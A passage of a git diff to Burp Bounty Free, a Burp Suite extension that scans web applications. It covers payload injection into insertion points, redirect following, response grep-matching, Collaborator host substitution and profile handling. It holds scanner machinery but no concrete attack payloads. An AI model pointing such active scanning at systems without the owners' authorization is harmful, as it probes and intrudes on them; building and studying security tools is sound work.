+ ex.getMessage()); + for (StackTraceElement element : ex.getStackTrace()) { + System.out.println(element); + } + return; + } + responseCode = new Integer(r.getStatusCode()); + } + loop += 1; + } else { + redirect = false; + } + } while (redirect); + } + } catch (Exception ex) { + System.out.println("ActiveScanner line 589: " + ex.getMessage()); + for (StackTraceElement element : ex.getStackTrace()) { + System.out.println(element); + } + } + + } + + public void stringRegexMatchType(IHttpRequestResponse baseRequestResponse, IScannerInsertionPoint insertionPoint, String payload, String rule_name,IBurpCollaboratorClientContext CollaboratorClientContext2, String bchost) { + int loop = 0; + Boolean redirect = true; + try { + if (bchost.isEmpty()) { + bchost = CollaboratorClientContext2.generatePayload(true); + String subdomain = generateString(); + bchost = subdomain + "." + bchost; + } + } catch (Exception ex) { + bchost = ""; + } + + //multiarray + int grep_index = 0; + ArrayList> greps_final = new ArrayList<>(); + IScanIssue matches = null; + + try { + Boolean isduplicated = utils.checkDuplicated(baseRequestResponse, issuename, insertionPoint); + + if (!isduplicated) { + IHttpService httpService = baseRequestResponse.getHttpService(); + + greps_final.add(new ArrayList()); + for (String grep : greps) { + + String[] tokens = grep.split(",", 3); + + if (tokens[0].equals("true")) { + if (tokens[1].equals("And") || tokens[1].equals("")) { + if (!tokens[2].equals("")) { + greps_final.get(grep_index).add(tokens[2]); + } + } else { + if (!tokens[2].equals("")) { + if (!greps_final.get(0).isEmpty()) { + greps_final.add(new ArrayList()); + grep_index = grep_index + 1; + greps_final.get(grep_index).add(tokens[2]); + } else { + greps_final.get(grep_index).add(tokens[2]); + } + } + } + } + } + IHttpRequestResponse requestResponse; + try { + requestResponse = callbacks.makeHttpRequest(httpService, new BuildUnencodeRequest(helpers).buildUnencodedRequest(insertionPoint, helpers.stringToBytes(payload), headers, bchost)); + } catch (NullPointerException e) { + return; + } + if (requestResponse == null) { + return; + } + + IHttpRequestResponse redirectRequestResponse = requestResponse; + IResponseInfo r; + + try { + if (redirectRequestResponse.getResponse() == null) { + return; + + } + r = helpers.analyzeResponse(redirectRequestResponse.getResponse()); + } catch (Exception ex) { + System.out.println("ActiveScanner line 816: " + ex.getMessage()); + for (StackTraceElement element : ex.getStackTrace()) { + System.out.println(element); + } + return; + } + + Integer responseCode = new Integer(r.getStatusCode()); + IRequestInfo requestInfo = helpers.analyzeRequest(requestResponse); + + if ((!isresponsecode || isresponsecode && utils.isResponseCode(responsecode, negativerc, responseCode)) && (!iscontenttype || iscontenttype && utils.isContentType(contenttype, negativect, r))) { + for (int x = 0; x <= grep_index; x++) { + if (!greps_final.get(x).isEmpty()) { + matches = gm.getResponseMatches(requestResponse, payload, greps_final.get(x), issuename, "Vulnerable parameter: " + insertionPoint.getInsertionPointName() + ".
" + issuedetail, issuebackground, remediationdetail, remediationbackground, charstourlencode, matchtype, + issueseverity, issueconfidence, notresponse, casesensitive, urlencode, excludeHTTP, onlyHTTP); + //mirar si peta asi + if (matches != null) { + callbacks.addScanIssue(matches); + return; + } + } + + } + } + do { + if (responseCodes.contains(responseCode) && redirtype != 1 && loop < maxredirect && maxredirect < limitredirect) { + httpService = requestResponse.getHttpService(); + URL url = null; + try { + url = utils.getRedirection(requestResponse, httpService, redirtype); + } catch (NullPointerException e) { + redirect = false; + } + + if (url != null) { + try { + byte[] checkRequest = helpers.buildHttpRequest(url); + checkRequest = utils.getMatchAndReplace(headers, checkRequest, payload, ""); + int port = 0; + + if (url.getPort() == -1) { + port = url.getDefaultPort(); + } + + IHttpService newrequest = helpers.buildHttpService(url.getHost(), port, url.getProtocol()); + requestResponse = callbacks.makeHttpRequest(newrequest, checkRequest); + } catch (Exception e) { + return; + } + + if (requestResponse == null) { + return; + } + + try { + if (requestResponse.getResponse() == null) { + return; + + } + r = helpers.analyzeResponse(requestResponse.getResponse()); + } catch (Exception ex) { + System.out.println("ActiveScanner line 880: " + ex.getMessage()); + for (StackTraceElement element : ex.getStackTrace()) { + System.out.println(element); + } + return; + } + responseCode = new Integer(r.getStatusCode()); + requestInfo = helpers.analyzeRequest(baseRequestResponse); + + if ((!isresponsecode || isresponsecode && utils.isResponseCode(responsecode, negativerc, responseCode)) && (!iscontenttype || iscontenttype && utils.isContentType(contenttype, negativect, r))) { + for (int x = 0; x <= grep_index; x++) { + if (!greps_final.get(x).isEmpty()) { + matches = gm.getResponseMatches(requestResponse, payload, greps_final.get(x), issuename, "Vulnerable parameter: " + insertionPoint.getInsertionPointName() + ".
" + issuedetail, issuebackground, remediationdetail, remediationbackground, charstourlencode, matchtype, + issueseverity, issueconfidence, notresponse, casesensitive, urlencode, excludeHTTP, onlyHTTP); + //mirar si peta asi + if (matches != null) { + callbacks.addScanIssue(matches); + return; + } + } + + } + + } + } else { + redirect = false; + } + } else { + redirect = false; + } + loop += 1; + } while (redirect); + } + } catch (Exception ex) { + System.out.println("ActiveScanner line 729: " + ex.getMessage()); + for (StackTraceElement element : ex.getStackTrace()) { + System.out.println(element); + } + } + } + + public static String generateString() { + String uuid = UUID.randomUUID().toString().replace("-", "").replace("7", ""); + return "7"+uuid+"7"; + } +} diff --git a/src/BuildUnencodeRequest.java b/src/BuildUnencodeRequest.java index fe2b9fb..4c05a9a 100755 --- a/src/BuildUnencodeRequest.java +++ b/src/BuildUnencodeRequest.java @@ -1,7 +1,9 @@ -package burpbounty; +package burpbountyfree; import burp.IExtensionHelpers; +import burp.IRequestInfo; import burp.IScannerInsertionPoint; +import java.util.ArrayList; import java.util.List; public class BuildUnencodeRequest { @@ -17,45 +19,70 @@ byte[] buildUnencodedRequest(IScannerInsertionPoint iScannerInsertionPoint, byte byte[] request = iScannerInsertionPoint.buildRequest(canary); int canaryPos = findCanary(canary, request); System.arraycopy(payload, 0, request, canaryPos, payload.length); + byte[] finalRequest = request; String tempRequest = helpers.bytesToString(request); String stringpayload = helpers.bytesToString(payload); if (!headers.isEmpty()) { - for (int x = 0; x < headers.size(); x++) { - String replace = headers.get(x).replace; - if (headers.get(x).type.equals("Request")) { - if (headers.get(x).regex.equals("String")) { - if (replace.contains("{PAYLOAD}")) { - replace = replace.replace("{PAYLOAD}", stringpayload); - } - if (replace.contains("{BC}")) { - replace = replace.replace("{BC}", bchost); - } - if (headers.get(x).match.isEmpty()) { - tempRequest = tempRequest.replace("\r\n\r\n", "\r\n" + replace + "\r\n\r\n"); - } else { - tempRequest = tempRequest.replace(headers.get(x).match, replace); - } - } else { - if (replace.contains("{PAYLOAD}")) { - replace = replace.replaceAll("\\{PAYLOAD\\}", stringpayload); - } - if (replace.contains("{BC}")) { - replace = replace.replaceAll("\\{BC\\}", bchost); - } - if (headers.get(x).match.isEmpty()) { - tempRequest = tempRequest.replaceAll("\\r\\n\\r\\n", "\r\n" + replace + "\r\n\r\n"); + try { + for (int x = 0; x < headers.size(); x++) { + String replace = headers.get(x).replace; + if (headers.get(x).type.equals("Request")) { + if (headers.get(x).regex.equals("String")) { + if (replace.contains("{PAYLOAD}")) { + replace = replace.replace("{PAYLOAD}", stringpayload); + } + if (replace.contains("{BC}")) { + replace = replace.replace("{BC}", bchost); + } + if (headers.get(x).match.isEmpty()) { + tempRequest = tempRequest.replace("\r\n\r\n", "\r\n" + replace + "\r\n\r\n"); + } else { + tempRequest = tempRequest.replace(headers.get(x).match, replace); + } } else { - tempRequest = tempRequest.replaceAll(headers.get(x).match, replace); + if (replace.contains("{PAYLOAD}")) { + replace = replace.replaceAll("\\{PAYLOAD\\}", stringpayload); + } + if (replace.contains("{BC}")) { + replace = replace.replaceAll("\\{BC\\}", bchost); + } + if (headers.get(x).match.isEmpty()) { + tempRequest = tempRequest.replaceAll("\\r\\n\\r\\n", "\r\n" + replace + "\r\n\r\n"); + } else { + tempRequest = tempRequest.replaceAll(headers.get(x).match, replace); + } } + } + } + } catch (Exception e) { +// System.out.println("BuildUnencodeRequest line 898: " + e.getMessage()); +// for (StackTraceElement element : e.getStackTrace()) { +// System.out.println(element); +// } + } + } + if (tempRequest.toLowerCase().contains("Content-Length: ".toLowerCase())) { + byte[] byteRequest = helpers.stringToBytes(tempRequest); + IRequestInfo messageInfo = helpers.analyzeRequest(byteRequest); + int bodyOffset = messageInfo.getBodyOffset(); + List newheaders = messageInfo.getHeaders(); + int actualBody = request.length - bodyOffset; + for (String header : newheaders) { + if (header.toLowerCase().startsWith("Content-Length: ".toLowerCase())) { + header = "Content-Length: " + actualBody; } } - return helpers.stringToBytes(tempRequest); + byte[] body = helpers.stringToBytes(tempRequest.substring(bodyOffset, byteRequest.length)); + finalRequest = helpers.buildHttpMessage(newheaders, body); + }else{ + finalRequest = helpers.stringToBytes(tempRequest); } - return request; + + return finalRequest; } private byte[] buildCanary(int payloadLength) { @@ -70,4 +97,5 @@ private int findCanary(byte[] canary, byte[] request) { int canaryPos = helpers.indexOf(request, canary, false, 0, request.length); return canaryPos; } -} \ No newline at end of file + +} diff --git a/src/BurpBountyExtension.java b/src/BurpBountyExtension.java index 3e6aef4..4757ce8 100755 --- a/src/BurpBountyExtension.java +++ b/src/BurpBountyExtension.java @@ -13,14 +13,16 @@ See the License for the specific language governing permissions and limitations under the License. */ -package burpbounty; +package burpbountyfree; -import burp.IBurpCollaboratorClientContext; import burp.IBurpExtender; import burp.IBurpExtenderCallbacks; import burp.IExtensionHelpers; import burp.IExtensionStateListener; import burp.IHttpRequestResponse; +import burp.IHttpService; +import burp.IMessageEditor; +import burp.IMessageEditorController; import burp.IRequestInfo; import burp.IScanIssue; import burp.IScannerCheck; @@ -28,24 +30,20 @@ import burp.IScannerInsertionPointProvider; import burp.ITab; import com.google.gson.Gson; +import com.google.gson.GsonBuilder; import com.google.gson.JsonArray; -import com.google.gson.JsonParser; -import com.google.gson.stream.JsonReader; -import java.awt.Component; import java.awt.Dimension; -import java.io.File; -import java.io.FileReader; +import javax.swing.ScrollPaneConstants; +import java.awt.Component; import java.util.ArrayList; import java.util.List; import javax.swing.JScrollPane; -import javax.swing.ScrollPaneConstants; import javax.swing.SwingUtilities; -public class BurpBountyExtension implements IBurpExtender, ITab, IScannerCheck, IExtensionStateListener, IScannerInsertionPointProvider { +public class BurpBountyExtension implements IBurpExtender, ITab, IScannerCheck, IExtensionStateListener, IScannerInsertionPointProvider, IMessageEditorController { public static IBurpExtenderCallbacks callbacks; private IExtensionHelpers helpers; - List CollaboratorClientContext; private JScrollPane optionsTab; private BurpBountyGui panel; ProfilesProperties issue; @@ -53,100 +51,129 @@ public class BurpBountyExtension implements IBurpExtender, ITab, IScannerCheck, BurpCollaboratorThread bct; CollaboratorData burpCollaboratorData; List responses; - List params; - Gson gson; - int scanner; + List urls; JsonArray profiles; + JsonArray rules; + Integer bchost_number = 0; + Boolean settext = false; + public IMessageEditor requestViewer; + public IMessageEditor responseViewer; + public IHttpRequestResponse currentlyDisplayedItem; + JsonArray allprofiles = new JsonArray(); + JsonArray activeprofiles = new JsonArray(); + JsonArray passiveresprofiles = new JsonArray(); + JsonArray passivereqprofiles = new JsonArray(); + List issues = new ArrayList(); + List params = new ArrayList(); + int scanner = 0; + Boolean enabled = false; + List insertion_point_type = new ArrayList(); + JsonArray allrules = new JsonArray(); @Override public void registerExtenderCallbacks(IBurpExtenderCallbacks callbacks) { this.callbacks = callbacks; this.helpers = callbacks.getHelpers(); - callbacks.setExtensionName("Burp Bounty"); + callbacks.setExtensionName("Burp Bounty Free"); responses = new ArrayList(); - params = new ArrayList(); - gson = new Gson(); - callbacks.registerScannerCheck(this); - callbacks.registerExtensionStateListener(this); - callbacks.registerScannerInsertionPointProvider(this); - CollaboratorClientContext = new ArrayList(); - burpCollaboratorData = new CollaboratorData(helpers); - bct = new BurpCollaboratorThread(callbacks, burpCollaboratorData); - bct.start(); - - SwingUtilities.invokeLater(() -> { - panel = new BurpBountyGui(this); - optionsTab = new JScrollPane(panel, ScrollPaneConstants.VERTICAL_SCROLLBAR_AS_NEEDED, ScrollPaneConstants.HORIZONTAL_SCROLLBAR_AS_NEEDED); - optionsTab.setPreferredSize(new Dimension(600, 600)); - optionsTab.getVerticalScrollBar().setUnitIncrement(20); - callbacks.addSuiteTab(this); - - callbacks.printOutput("- Burp Bounty v3.6"); - callbacks.printOutput("- For bugs please on the official github: https://github.com/wagiro/BurpBounty/"); - callbacks.printOutput("- Created by Eduardo Garcia Melia "); - }); - - } - - public JsonArray getProfiles() { - FileReader fr; + urls = new ArrayList(); + urls.add(new String[]{"testXXYY", "test"}); try { - JsonArray data = new JsonArray(); - File f = new File(panel.profiles_directory); - if (f.exists() && f.isDirectory()) { - for (File file : f.listFiles()) { - if (file.getName().endsWith(".bb")) { - fr = new FileReader(file.getAbsolutePath()); - JsonReader json = new JsonReader((fr)); - JsonParser parser = new JsonParser(); - data.addAll(parser.parse(json).getAsJsonArray()); - fr.close(); - } - - } - } - return data; + burpCollaboratorData = new CollaboratorData(helpers); + bct = new BurpCollaboratorThread(callbacks, burpCollaboratorData); + bct.start(); } catch (Exception e) { - callbacks.printError("BurpBountyGui line 1823:" + e.getMessage()); - return null; + System.out.println("BurpBountyExtension line 108:" + e.getMessage()); } + + + SwingUtilities.invokeLater(new Runnable() { + @Override + public void run() { + + panel = new BurpBountyGui(BurpBountyExtension.this); + optionsTab = new JScrollPane(panel, ScrollPaneConstants.VERTICAL_SCROLLBAR_AS_NEEDED, ScrollPaneConstants.HORIZONTAL_SCROLLBAR_AS_NEEDED); + optionsTab.setPreferredSize(new Dimension(600, 600)); + optionsTab.getVerticalScrollBar().setUnitIncrement(20); + callbacks.registerScannerCheck(BurpBountyExtension.this); + callbacks.registerExtensionStateListener(BurpBountyExtension.this); + callbacks.registerScannerInsertionPointProvider(BurpBountyExtension.this); + + requestViewer = callbacks.createMessageEditor(BurpBountyExtension.this, false); + responseViewer = callbacks.createMessageEditor(BurpBountyExtension.this, false); + + callbacks.addSuiteTab(BurpBountyExtension.this); + + callbacks.printOutput("- Burp Bounty Free v4.0"); + callbacks.printOutput("- For bugs please on the official github: https://github.com/wagiro/BurpBounty/"); + callbacks.printOutput("- Created and developed by Eduardo Garcia Melia "); + callbacks.printOutput("\nBurp Bounty team:"); + callbacks.printOutput("- Eduardo Garcia Melia "); + callbacks.printOutput("- Jaime Restrepo "); + + } + }); } @Override public void extensionUnloaded() { bct.doStop(); + callbacks.printOutput("- Burp Bounty extension was unloaded"); } @Override public List getInsertionPoints(IHttpRequestResponse baseRequestResponse) { List insertionPoints = new ArrayList(); - + Gson gson = new Gson(); + Boolean exist_insertion_point_in_profiles = false; try { - IRequestInfo request = helpers.analyzeRequest(baseRequestResponse); - if (request.getMethod().equals("GET")) { - String url = request.getUrl().getHost(); - byte[] match = helpers.stringToBytes("/"); - byte[] req = baseRequestResponse.getRequest(); - int len = helpers.bytesToString(baseRequestResponse.getRequest()).indexOf("HTTP"); - int beginAt = 0; - - while (beginAt < len) { - beginAt = helpers.indexOf(req, match, false, beginAt, len); - if (beginAt == -1) { - break; - } - if (!params.contains(url + ":p4r4m" + beginAt)) { - insertionPoints.add(helpers.makeScannerInsertionPoint("p4r4m" + beginAt, baseRequestResponse.getRequest(), beginAt, helpers.bytesToString(baseRequestResponse.getRequest()).indexOf(" HTTP"))); - params.add(url + ":p4r4m" + beginAt); + if (baseRequestResponse == null || baseRequestResponse.getRequest() == null) { + return insertionPoints; + } + + for (int i = 0; i < activeprofiles.size(); i++) { + Object idata = activeprofiles.get(i); + ProfilesProperties profile_property = gson.fromJson(idata.toString(), ProfilesProperties.class); + for (int insertionPoint : profile_property.getInsertionPointType()) { + if (insertionPoint == 65) { + exist_insertion_point_in_profiles = true; } - beginAt += match.length; + + } + } + if (!exist_insertion_point_in_profiles) { + return insertionPoints; + } + + IRequestInfo request = helpers.analyzeRequest(baseRequestResponse); + + String url = request.getUrl().getHost(); + byte[] match = helpers.stringToBytes("/"); + byte[] req = baseRequestResponse.getRequest(); + int len = helpers.bytesToString(baseRequestResponse.getRequest()).indexOf(" HTTP"); + int firstSlash = helpers.bytesToString(baseRequestResponse.getRequest()).indexOf(" /"); + int beginAt = 0; + while (beginAt < len) { + beginAt = helpers.indexOf(req, match, false, beginAt, len); + if (beginAt == -1) { + break; } + String mark = helpers.bytesToString(baseRequestResponse.getRequest()).substring(firstSlash, beginAt); + if (!params.contains(url + ":p4r4m" + mark)) { + insertionPoints.add(helpers.makeScannerInsertionPoint("p4r4m" + mark, baseRequestResponse.getRequest(), beginAt, len)); + params.add(url + ":p4r4m" + mark); + } + beginAt += match.length; + } + } catch (NullPointerException ex) { + System.out.println("BurpBountyExtension line 167: " + ex.getMessage());//Da Number Format Exception + for (StackTraceElement element : ex.getStackTrace()) { + System.out.println(element); } - } catch (NullPointerException e) { return insertionPoints; } return insertionPoints; @@ -154,80 +181,50 @@ public List getInsertionPoints(IHttpRequestResponse base @Override public List doActiveScan(IHttpRequestResponse baseRequestResponse, IScannerInsertionPoint insertionPoint) { - JsonArray allprofiles = getProfiles(); - JsonArray activeprofiles = new JsonArray(); - params = new ArrayList(); - try { - for (int i = 0; i < allprofiles.size(); i++) { - Object idata = allprofiles.get(i); - issue = gson.fromJson(idata.toString(), ProfilesProperties.class); - scanner = issue.getScanner(); - - if (scanner == 1 && issue.getEnabled() && issue.getInsertionPointType().contains(insertionPoint.getInsertionPointType() & 0xFF)) { - activeprofiles.add(allprofiles.get(i)); - } - - } if (activeprofiles.size() == 0) { - return null; + return issues; } - GenericScan as = new GenericScan(this, callbacks, burpCollaboratorData, panel.getProfilesFilename(), allprofiles); - - IBurpCollaboratorClientContext CollaboratorClientContext2 = callbacks.createBurpCollaboratorClientContext(); - burpCollaboratorData.setCollaboratorClientContext(CollaboratorClientContext2); - String bchost = CollaboratorClientContext2.generatePayload(true); - return as.runAScan(baseRequestResponse, insertionPoint, activeprofiles, bchost); - } catch (Exception ex) { - callbacks.printError("BurpBountyExtension line 174: " + ex.getMessage()); - } - return null; + try { + ActiveScanner as = new ActiveScanner(this, callbacks, burpCollaboratorData, allprofiles, panel); + as.runAScan(baseRequestResponse, insertionPoint, activeprofiles, false, false, "", false); + } catch (Exception ex) { + System.out.println("BurpBountyExtension line 189: " + ex.getMessage());//Da Number Format Exception + for (StackTraceElement element : ex.getStackTrace()) { + System.out.println(element); + } + } + return issues; } @Override public List doPassiveScan(IHttpRequestResponse baseRequestResponse) { - JsonArray allprofiles = getProfiles(); - JsonArray passiveresprofiles = new JsonArray(); - JsonArray passivereqprofiles = new JsonArray(); - List issues = new ArrayList(); - - for (int i = 0; i < allprofiles.size(); i++) { - Object idata = allprofiles.get(i); - issue = gson.fromJson(idata.toString(), ProfilesProperties.class); - scanner = issue.getScanner(); - if (issue.getEnabled() && scanner == 2) { - passiveresprofiles.add(allprofiles.get(i)); - } else if (issue.getEnabled() && scanner == 3) { - passivereqprofiles.add(allprofiles.get(i)); - } - } - - if (passiveresprofiles.size() > 0) { - GenericScan ps = new GenericScan(this, callbacks, burpCollaboratorData, panel.getProfilesFilename(), allprofiles); - try { - IBurpCollaboratorClientContext CollaboratorClientContext2 = callbacks.createBurpCollaboratorClientContext(); - burpCollaboratorData.setCollaboratorClientContext(CollaboratorClientContext2); - String bchost = CollaboratorClientContext2.generatePayload(true); - issues.addAll(ps.runResPScan(baseRequestResponse, passiveresprofiles, bchost)); - } catch (Exception ex) { - callbacks.printError("BurpBountyExtension line 219: " + ex.getMessage()); + if (passiveresprofiles.size() > 0) { + try { + PassiveResponseScanner prs = new PassiveResponseScanner(this, callbacks, burpCollaboratorData, allprofiles, activeprofiles, panel); + prs.runResPScan(baseRequestResponse, passiveresprofiles, allrules, urls, false); + } catch (Exception ex) { + System.out.println("BurpBountyExtension line 206: " + ex.getMessage()); + for (StackTraceElement element : ex.getStackTrace()) { + System.out.println(element); + } + } } - } - if (passivereqprofiles.size() > 0) { - GenericScan ps = new GenericScan(this, callbacks, burpCollaboratorData, panel.getProfilesFilename(), allprofiles); + if (passivereqprofiles.size() > 0) { - try { - IBurpCollaboratorClientContext CollaboratorClientContext2 = callbacks.createBurpCollaboratorClientContext(); - burpCollaboratorData.setCollaboratorClientContext(CollaboratorClientContext2); - String bchost = CollaboratorClientContext2.generatePayload(true); - issues.addAll(ps.runReqPScan(baseRequestResponse, passivereqprofiles, bchost)); - } catch (Exception ex) { - callbacks.printError("BurpBountyExtension line 229: " + ex.getMessage()); + try { + PassiveRequestScanner pqs = new PassiveRequestScanner(this, callbacks, burpCollaboratorData, allprofiles, activeprofiles, panel); + pqs.runReqPScan(baseRequestResponse, passivereqprofiles, allrules, urls, false); + } catch (Exception ex) { + System.out.println("BurpBountyExtension line 219: " + ex.getMessage()); + for (StackTraceElement element : ex.getStackTrace()) { + System.out.println(element); + } + } } - } return issues; } @@ -242,7 +239,7 @@ public int consolidateDuplicateIssues(IScanIssue existingIssue, IScanIssue newIs @Override public String getTabCaption() { - return "Burp Bounty"; + return "Burp Bounty Free"; } @Override @@ -250,4 +247,86 @@ public Component getUiComponent() { return optionsTab; } + public void setTest(Boolean test) { + settext = test; + } + + public void setAllProfiles(JsonArray allProfiles) { + allprofiles = allProfiles; + setActiveProfiles(allprofiles); + setPassiveProfiles(allprofiles); + } + + public void setActiveProfiles(JsonArray allprofiles) { + GsonBuilder builder = new GsonBuilder().setPrettyPrinting(); + Gson gson = builder.create(); + int scanner = 0; + ProfilesProperties issue; + List insertion_point_type = new ArrayList(); + Boolean enabled = false; + activeprofiles = new JsonArray(); + + for (int i = 0; i < allprofiles.size(); i++) { + try { + Object idata = allprofiles.get(i); + issue = gson.fromJson(idata.toString(), ProfilesProperties.class); + scanner = issue.getScanner(); + enabled = issue.getEnabled(); + insertion_point_type = issue.getInsertionPointType(); + } catch (Exception ex) { + System.out.println("BurpBountyExtension line 399: " + ex.getMessage()); + continue; + } + + if (scanner == 1 && enabled) { + activeprofiles.add(allprofiles.get(i)); + } + } + } + + public void setPassiveProfiles(JsonArray allprofiles) { + passiveresprofiles = new JsonArray(); + passivereqprofiles = new JsonArray(); + GsonBuilder builder = new GsonBuilder().setPrettyPrinting(); + Gson gson = builder.create(); + int scanner = 0; + Boolean enabled = false; + ProfilesProperties issue; + + for (int i = 0; i < allprofiles.size(); i++) { + try { + Object idata = allprofiles.get(i); + issue = gson.fromJson(idata.toString(), ProfilesProperties.class); + scanner = issue.getScanner(); + enabled = issue.getEnabled(); + } catch (Exception ex) { + System.out.println("BurpBountyExtension line 341: " + ex.getMessage()); + continue; + } + if (enabled && scanner == 2) { + passiveresprofiles.add(allprofiles.get(i)); + } else if (enabled && scanner == 3) { + passivereqprofiles.add(allprofiles.get(i)); + } + } + } + + public void setRules(JsonArray allRules) { + allrules = allRules; + } + + @Override + public byte[] getRequest() { + return currentlyDisplayedItem.getRequest(); + } + + @Override + public byte[] getResponse() { + return currentlyDisplayedItem.getResponse(); + } + + @Override + public IHttpService getHttpService() { + return currentlyDisplayedItem.getHttpService(); + } } diff --git a/src/BurpBountyGui.form b/src/BurpBountyGui.form index 2bd555a..6647a84 100755 --- a/src/BurpBountyGui.form +++ b/src/BurpBountyGui.form @@ -103,6 +103,34 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + @@ -292,12 +320,12 @@ - + - + @@ -312,10 +340,10 @@ - + - + @@ -332,7 +360,7 @@ - + @@ -340,6 +368,9 @@ + + + @@ -396,12 +427,12 @@ - + - + @@ -416,10 +447,10 @@ - + - + @@ -436,7 +467,7 @@ - + @@ -500,12 +531,12 @@ - + - + @@ -520,10 +551,10 @@ - + - + @@ -540,7 +571,7 @@ - + @@ -613,7 +644,6 @@ - @@ -623,6 +653,7 @@ + @@ -633,7 +664,7 @@ - + @@ -656,20 +687,20 @@ - + - + - + @@ -771,7 +802,10 @@ - + + + + @@ -786,112 +820,223 @@ - - - - - + + + + + + + + + + + + + + + + - - - - - - + + + + + + + + - + + + + + + + + - - - + - - - - - - - - + + + + + + + + + + + + + + + - + - + - + - + - + - + + - + - + - + - - - - - - - + - + + + + + + + + + - + - + + - + + + + + + + + + + + + + + + + + + + + - + + + + + + + + + - + - + - + - + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + diff --git a/src/BurpBountyGui.java b/src/BurpBountyGui.java index 7e43003..7000a09 100755 --- a/src/BurpBountyGui.java +++ b/src/BurpBountyGui.java @@ -13,10 +13,14 @@ See the License for the specific language governing permissions and limitations under the License. */ -package burpbounty; +package burpbountyfree; import burp.IBurpExtenderCallbacks; +import burp.IExtensionHelpers; +import burp.IHttpRequestResponse; +import burp.IResponseInfo; import com.google.gson.Gson; +import com.google.gson.GsonBuilder; import com.google.gson.JsonArray; import com.google.gson.JsonElement; import com.google.gson.JsonObject; @@ -43,8 +47,8 @@ import java.io.PrintWriter; import java.net.URI; import java.net.URISyntaxException; +import java.nio.file.Files; import java.util.ArrayList; -import java.util.Arrays; import java.util.List; import java.util.Set; import java.util.TreeSet; @@ -54,6 +58,8 @@ import javax.swing.JFrame; import javax.swing.JOptionPane; import javax.swing.JTable; +import javax.swing.RowSorter; +import javax.swing.SortOrder; import javax.swing.event.TableModelEvent; import javax.swing.event.TableModelListener; import javax.swing.table.DefaultTableModel; @@ -63,1510 +69,143 @@ public class BurpBountyGui extends javax.swing.JPanel { private IBurpExtenderCallbacks callbacks; + private IExtensionHelpers helpers; public String filename; - private String name; - private String issuename; - private String issuedetail; - private String issuebackground; - private String remediationdetail; - private String remediationbackground; - private String charstourlencode; - private int scanner; - private int matchtype; - private String issueseverity; - private String issueconfidence; - private String responsecode; - private String contenttype; - private boolean negativect; - private boolean negativerc; - private boolean notresponse; - private boolean casesensitive; - private boolean excludeHTTP; - private boolean onlyHTTP; - private boolean urlencode; - private boolean isresponsecode; - private boolean iscontenttype; - private int redirtype; - private int maxRedir; - private int payloadPosition; - private String payloadsfile; - private String grepsfile; - private String timeOut; - private String contentLength; - private String author; - private DefaultListModel tagmanager; - private List headers; - private List variationAttributes; - private List insertionPointType; - private List Tags; - Boolean pathDiscovery; + Boolean pathDiscovery; + JsonArray allrules; + JsonArray allprofiles; + JsonArray activeprofiles; + JsonArray passiveresprofiles; + JsonArray passivereqprofiles; DefaultTableModel model; DefaultTableModel model1; DefaultTableModel model2; DefaultTableModel model4; DefaultTableModel model9; DefaultTableModel model10; + DefaultTableModel rulemodel; DefaultTableModel modeltagmanager; + DefaultTableModel dashboardmodel; + DefaultListModel tagmanager; String profiles_directory; BurpBountyExtension parent; public BurpBountyGui(BurpBountyExtension parent) { - this.callbacks = parent.callbacks; - this.parent = parent; - filename = ""; - name = ""; - issuename = ""; - issuedetail = ""; - issuebackground = ""; - remediationdetail = ""; - remediationbackground = ""; - charstourlencode = ""; - scanner = 0; - matchtype = 0; - issueseverity = ""; - issueconfidence = ""; - responsecode = ""; - contenttype = ""; - negativect = false; - negativerc = false; - notresponse = false; - casesensitive = false; - excludeHTTP = false; - onlyHTTP = false; - urlencode = false; - isresponsecode = false; - iscontenttype = false; - redirtype = 0; - maxRedir = 0; - payloadPosition = 0; - payloadsfile = ""; - grepsfile = ""; - timeOut = ""; - contentLength = ""; - author = ""; - tagmanager = new DefaultListModel(); - model4 = new DefaultTableModel(); - model9 = new DefaultTableModel(); - model10 = new DefaultTableModel(); - modeltagmanager = new DefaultTableModel(); - headers = new ArrayList(); - variationAttributes = new ArrayList(); - insertionPointType = new ArrayList(); - - if (callbacks.loadExtensionSetting("filename") != null) { - filename = callbacks.loadExtensionSetting("filename"); - profiles_directory = filename + File.separator; - } else { - filename = System.getProperty("user.home"); - profiles_directory = filename + File.separator; - } - - - model = new DefaultTableModel() { - - @Override - public Class getColumnClass(int columnIndex) { - Class clazz = String.class; - switch (columnIndex) { - case 0: - clazz = Boolean.class; - break; - } - return clazz; - } - - @Override - public boolean isCellEditable(int row, int column) { - return column == 0; - } - }; - - model1 = new DefaultTableModel() { - - @Override - public Class getColumnClass(int columnIndex) { - Class clazz = String.class; - switch (columnIndex) { - case 0: - clazz = Boolean.class; - break; - } - return clazz; - } - - @Override - public boolean isCellEditable(int row, int column) { - return column == 0; - } - }; - - model2 = new DefaultTableModel() { - @Override - public Class getColumnClass(int columnIndex) { - Class clazz = String.class; - switch (columnIndex) { - case 0: - clazz = Boolean.class; - break; - } - return clazz; - } - - @Override - public boolean isCellEditable(int row, int column) { - return column == 0; - } - }; - - //main - initComponents(); - text11.setText(filename); - makeTagsFile(); - showTags(); - showProfiles("All"); - } - - public void setActiveAttackValues(String profiles, ActiveProfile profile) { - //Set Attack values when select from main combobox try { - Gson gson = new Gson(); - JsonArray json = initJson(); - ProfilesProperties profile_property = new ProfilesProperties(); - - if (json != null) { - for (JsonElement pa : json) { - JsonObject bbObj = pa.getAsJsonObject(); - if (bbObj.get("Name").getAsString().equals(profiles)) { - profile_property = gson.fromJson(bbObj.toString(), ProfilesProperties.class - ); - } - - } - } - - name = profile_property.getName(); - scanner = profile_property.getScanner(); - casesensitive = profile_property.getCaseSensitive(); - notresponse = profile_property.getNotResponse(); - matchtype = profile_property.getMatchType(); - issuename = profile_property.getIssueName(); - issueseverity = profile_property.getIssueSeverity(); - issueconfidence = profile_property.getIssueConfidence(); - issuedetail = profile_property.getIssueDetail(); - issuebackground = profile_property.getIssueBackground(); - remediationdetail = profile_property.getRemediationDetail(); - remediationbackground = profile_property.getRemediationBackground(); - urlencode = profile_property.getUrlEncode(); - charstourlencode = profile_property.getCharsToUrlEncode(); - iscontenttype = profile_property.getIsContentType(); - isresponsecode = profile_property.getIsResponseCode(); - contenttype = profile_property.getContentType(); - responsecode = profile_property.getResponseCode(); - excludeHTTP = profile_property.getExcludeHTTP(); - onlyHTTP = profile_property.getOnlyHTTP(); - negativect = profile_property.getNegativeCT(); - negativerc = profile_property.getNegativeRC(); - redirtype = profile_property.getRedirection(); - maxRedir = profile_property.getMaxRedir(); - 